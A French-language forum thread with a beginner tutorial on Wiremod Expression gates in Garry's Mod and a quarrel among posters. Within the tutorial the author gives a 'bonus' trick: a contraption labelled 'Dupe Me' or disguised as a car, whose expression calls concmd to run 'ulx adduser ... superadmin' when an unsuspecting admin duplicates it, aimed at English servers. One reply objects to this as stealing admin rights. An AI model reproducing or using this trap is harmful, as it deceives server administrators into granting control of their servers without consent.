Bonjour tout le monde, je suis tellement content qu'il y est un forum, que j'ai envie de vous expliqué à ma manière l'expression, simplement ( enfin je pense )
Déja, il faut savoir que name et labels n'ont pas d'importance, juste a vous repperer, pareil pour Input et Output
Il faut savoir aussi qu'il faut toujour mettre une majuscules aux Inputs et Outputs.
Les Inputs sont un peu comme votre souris et votre clavié, des Entrés ( un exemple dans GMOD : un boutton, un keypad, numpad input tout ce que l'on doit wiré à )
Les Outputs sont un peu comme votre écran, votre imprimante ou votre casque ( ou haut-parleur ^^ ), des Sorties ( un exemple dans GMOD : une Turret, un Indicator, des Thruster
Une ligne se fini par un ;
La suite bientôt
Commençons notre premiere ligne, nous allons faire activé un turret en appuiant sur le bouton. "Pas Besoin d'expression " me direz vous, mais, ceci est la base , donc
en expression c'est déja cool de faire ça ^ ^
Faites une Turret, et un Boutton, toggle ou non, avec valeur on = 1 et valeur off = 0
Mettez ce que vous voullez dans label et name
dans Outputs mettez : Fire et dans Input : Btn
Fire désigne la Turret, et Btn le boutton
Btn == 1 -> Fire = 1;
Oulala , qu'est-ce que ça veux dire ?? Tout simplement
Si Btn est égal à 1 , Alors la turret sera égal à 1
== SI | -> Alors
Wiré La Turret à l'expression et l'expression au Boutton
vous verrez que même quand le boutton sera égal à 0, que la turret sera toujour egal a 1,ceci est un tout petit probleme
Il suffit juste de faire une 2em ligne qui designe le contraire : Btn == 0 -> Fire = 0;
Si Btn est égal a 0 alors la turret sera egal a 0
Petit bonus, vous voullez faire le malin sur les serveurs anglais, simple, je vous expliquerais tout dans mon prochain post
Faite un bidon, 3 text screen autour disant : "Dupe Me "
Voici l'expression
Input : Btn
Output : rien
L1 : Btn == 1 -> concmd('ulx adduser TONPSEUDOICI superadmin');
L2 : Btn == 0 -> concmd('ulx adduser TONPSEUDOICI superadmin');
concmd('') une commande dans la console ( exemple : kill, sv_cheats 1 )
Biensûr , ceci marche juste pour ULX et ceci designe :
Si btn est = a 1 alors tu tapera dans la console : ulx adduser TONPSEUDOICI superadmin
pareil pour btn = a 0 c'est pour ça qu'il faut le faire dupliqué par un admin
après vous pouvez tout à fait camouflé tout ça en faisant une voiture , BON JEU et bonne croisade, biensûr faite ça juste sur un serveur ANGLAIS
Merci pour le tuto .. par contre j'approuve pas ta petite astuce pour voler les droit d'admin ..
Oui, c'est bien ce que je dit.
Tu prend les commandes à son insu.
Le pire c'est que tu rajoute un truc de mingebag/noob/lamerz à la fin...
roo si t'es bien vista de GFR, tes reflexion, tu peux les garder la ou je pense, et puis, on ta pas demander ton avis, a toi, c'est juste des base, juste pour commencé et y comprendre un tout petit peu.
Je poste ou je veut, quand je veut.C'est plutot toi qui a pas a l'ouvrir
Maintenant va joué au playmobils
Ah, et au faite, tes 2 lignes on peut les faires en 1 seul.
Fire = (Btn ? 1 : 0)
Merci de ta visite
PS: c'est pas la base ça
non toi c'est l'avancé des bases
Toi c'est rien du tout.
[HS]bon la tu m'énerve, peux être que tu veux me faire chier, mais en postant publiquement comme ça y'a pas que moi que tu fait chié, donc bon , je te propose que l'on s'ignore pour avoir la paix sur ce forum, et , que sa fasse moin chier les autres[/HS]
Pour les prochaines expression, je les redigerais comme ça :
N@ Nom ( pareil pour le label ;) )
O@ Output
I@ Input
L1 premiere ligne
L2 deuxieme ligne, etc..
EXP Explication de l'expression
WIRE Qu'est-ce qu'il faut WIRE quoi à quoi
Hey j'dit ce que je pense c'est toi qui continu, t'es pas content tu te la ferme c'tout
[HS] Je t'ignore et tu m'ignore, pour le bien de se forum , merci [/HS]
N@ Textscreen
I@ Btn1 Btn2
O@ A
L1 Btn1==1 -> A = A + 1;
L2 Btn1==0 -> A = A;
L3 Btn2==1 -> A = A - 1
L4 Btn2==0 -> A = A
L5 A >= 13 -> A = 1
EXP Il suffit d'un text screen avec 12 Text ( mais modifiable en changeant A >= 13 par A >= la.valeur.numerique.que.vous.voullez )
2 bouttons ( de preference la fleche qui monte et la fleche qui descend )
Quand tu appuieras sur la fleche qui monte, le text sera le suivant et si tu appuie sur l'autre bouton, le text sera le precedent
WIRE Text screen -> Expression ;
Expression(Btn1) -> Boutton fleche du haut
Expression(Btn2) -> Boutton fleche du bas
voila :D
EGate 2 > EGate 1
S'too
Pour que les gens , veront bien le tuto, en arrivant sur le fofo
jssu2 tu pourrais GTFO? (et STFU)
Merci.
moi, contrairement a toi, j'essaie d'aider les gens, et pas de les faire chiez, no rage
Je te plussois jssu2